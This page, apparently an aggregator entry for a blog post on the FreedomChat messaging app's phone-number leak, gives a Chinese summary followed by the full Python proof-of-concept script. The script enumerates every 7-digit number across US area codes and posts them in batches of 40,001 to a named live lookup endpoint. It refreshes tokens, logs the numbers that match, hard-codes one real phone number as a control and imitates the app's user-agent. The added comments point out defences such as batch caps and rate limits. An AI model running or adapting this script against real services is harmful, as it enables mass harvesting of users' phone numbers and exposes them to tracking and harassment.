“超级安全”的MAGA主题消息应用泄露了所有用户的电话号码。
“Super secure” messaging app leaks everyone's phone number

原始链接: https://ericdaigle.ca/posts/super-secure-maga-messaging-app-leaks-everyones-phone-number/

此Python脚本尝试枚举并验证FreedomChat服务中的电话号码。它遍历美国区号列表,为每个区号生成所有7位数字组合,拼成候选电话号码,然后以每批40,000个的方式发送到FreedomChat API,检查这些号码的有效性。该脚本使用初始的`authToken`和`refreshToken`进行身份验证,并在令牌过期时自动刷新。它将进度记录到文件“freedom_enum_log.txt”中,包括当前处理的区号、遇到的任何API错误以及超过3秒的响应时间。每个批次中始终包含一个特定号码(+13322699625)。脚本会一直运行到测试完所有区号和组合为止,从而尝试识别FreedomChat平台上有效的电话号码。对防御方而言,这说明批量号码查询接口必须限制单次查询数量和请求频率,否则平台上的号码可以被逐一枚举出来。


原文
import itertools
import pandas as pd
import json
import requests
import datetime
import random

from time import sleep

# Area codes tried under the +1 country code; each one becomes the prefix of
# the candidate numbers built in the loop further down.
area_codes = [
    201, 202, 203, 205, 206, 207, 208, 209, 210, 212, 213, 214, 215, 216, 217, 218, 219, 224, 225, 228, 229, 231, 234, 239, 240, 242, 248, 251, 252, 253, 254, 256, 260, 262, 267, 269, 270, 276, 281, 283, 301, 302, 303, 304, 305, 307, 308, 309, 310, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 323, 325, 327, 330, 331, 334, 336, 337, 339, 340, 346, 347, 351, 352, 360, 361, 386, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 412, 413, 414, 415, 417, 418, 419, 423, 424, 425, 430, 432, 434, 435, 440, 443, 458, 469, 470, 475, 478, 479, 480, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 512, 513, 514, 515, 516, 517, 518, 520, 530, 540, 541, 551, 559, 561, 562, 563, 564, 567, 570, 571, 573, 574, 575, 580, 585, 586, 601, 602, 603, 605, 606, 607, 608, 609, 610, 612, 614, 615, 616, 617, 618, 619, 620, 630, 631, 636, 641, 646, 650, 651, 657, 660, 661, 662, 667, 669, 678, 681, 682, 701, 702, 703, 704, 705, 706, 707, 708, 712, 713, 714, 715, 716, 717, 718, 719, 720, 724, 727, 731, 732, 734, 740, 747, 754, 757, 760, 762, 763, 765, 770, 772, 773, 774, 775, 781, 784, 785, 786, 787, 801, 802, 803, 804, 805, 806, 808, 810, 812, 813, 814, 815, 816, 817, 818, 828, 830, 831, 832, 843, 845, 847, 848, 850, 856, 857, 858, 859, 860, 862, 863, 864, 865, 870, 872, 873, 876, 877, 878, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 912, 913, 914, 915, 916, 917, 918, 919, 920, 925, 928, 931, 937, 940, 941, 947, 951, 952, 954, 956, 970, 971, 972, 973, 975, 978, 979, 980, 985, 989
]

# Every 7-digit string (10**7 of them) is materialised in memory as a pandas
# Series of str.
digits = ("0", "1", "2", "3", "4", "5", "6", "7","8", "9")
orig_combinations = pd.Series(["".join(x) for x in itertools.product(digits, repeat=7)])
# Drop the strings whose first digit is 0 or 1, which leaves 8,000,000
# candidates per area code.
# Defensive note: with only 8,000,000 values per area code, a phone number
# cannot be treated as a secret by a lookup API; the whole space can be walked
# exhaustively unless the server limits how much one client may query.
orig_combinations = orig_combinations[~orig_combinations.str.startswith("0") & ~orig_combinations.str.startswith("1")]

# Main loop of the published proof of concept: for each area code, every
# candidate number is submitted to the FreedomChat number-lookup endpoint in
# batches, and unusual responses are written to a log file.
# Defensive takeaway: each request asks the server about 40,001 numbers and
# 200 such requests cover a whole area code. A lookup endpoint should cap the
# batch size, rate-limit per account, and alert on clients that query whole
# number ranges like this.
# Mode "w" truncates any log left by a previous run.
with open("freedom_enum_log.txt", "w") as logfile:
	# Shuffled in place, so the area codes are visited in a different order on each run.
	random.shuffle(area_codes)
	for ac in area_codes:
		logfile.write(f"Starting area code {ac}\n")
		# Build the "+1<area code><7 digits>" strings for this area code.
		# `c` is already a str, so ''.join(c) returns it unchanged.
		combinations = ["+1" + str(ac) + ''.join(c) for c in list(orig_combinations)]

		url = "https://eagle.freedomchat.com/user/numbers"
		# Placeholder strings as published. These assignments sit inside the
		# area-code loop, so any refreshed tokens are overwritten with the
		# placeholders again when the next area code starts.
		authToken = "initial auth token"
		refreshToken = "initial refresh token"

		# 8,000,000 / 40,000 = 200 requests per area code.
		for i in range(0, 8000000, 40000):
			# Slicing copies, so the append below does not modify `combinations`.
			tranche = combinations[i:i+40000]
			# The same fixed number is added to every batch.
			# NOTE(review): presumably a known-registered control number, which
			# would explain the `count("uid") != 1` check below; confirm against
			# the original post.
			tranche.append("+13322699625")
			payload = { "numbers": tranche }
			# Header values are hard-coded; the user-agent is an OkHttp client string.
			# NOTE(review): presumably mirrors what the mobile app sends, in which
			# case server-side detection cannot rely on the user-agent alone.
			headers = {
				"accept": "application/json, text/plain, */*",
				"authorization": f"Bearer {authToken}",
				"content-type": "application/json",
				"host": "eagle.freedomchat.com",
				"connection": "Keep-Alive",
				"accept-encoding": "gzip",
				"user-agent": "okhttp/4.12.0"
			}

			# No timeout or exception handling: a network error propagates and ends the run.
			response = requests.post(url, json=payload, headers=headers)
			# Token expiry is detected by a substring match on the body, not by status code.
			if "Unauthorized" in response.text:
				# The refresh URL contains a double slash, reproduced as published.
				refreshResponse = requests.post("https://eagle.freedomchat.com//auth/refresh", json={"refreshToken": refreshToken})
				authToken = refreshResponse.json()["accessToken"]
				refreshToken = refreshResponse.json()["refreshToken"]
				# NOTE(review): `headers` was built before the refresh, so this retry
				# still carries the previous bearer token; the new token is only
				# picked up when `headers` is rebuilt for the next batch.
				response = requests.post(url, json=payload, headers=headers)
			# Log the raw body whenever it does not contain exactly one "uid"
			# substring (zero occurrences, or more than one).
			# NOTE(review): presumably one "uid" belongs to the control number,
			# so more than one means a candidate matched; confirm the response schema.
			if response.text.count("uid") != 1:
				logfile.write(response.text + "\n")
			# Record any response that took longer than 3 seconds.
			if response.elapsed > datetime.timedelta(seconds=3):
				logfile.write(f"Getting slow! {response.elapsed}\n")
			# Flush after every batch so the log is current if the run is interrupted.
			logfile.flush()
		logfile.write(f"Done area code {ac}\n")
		# Rebind to drop the 8,000,000-element list before the next area code builds its own.
		combinations = []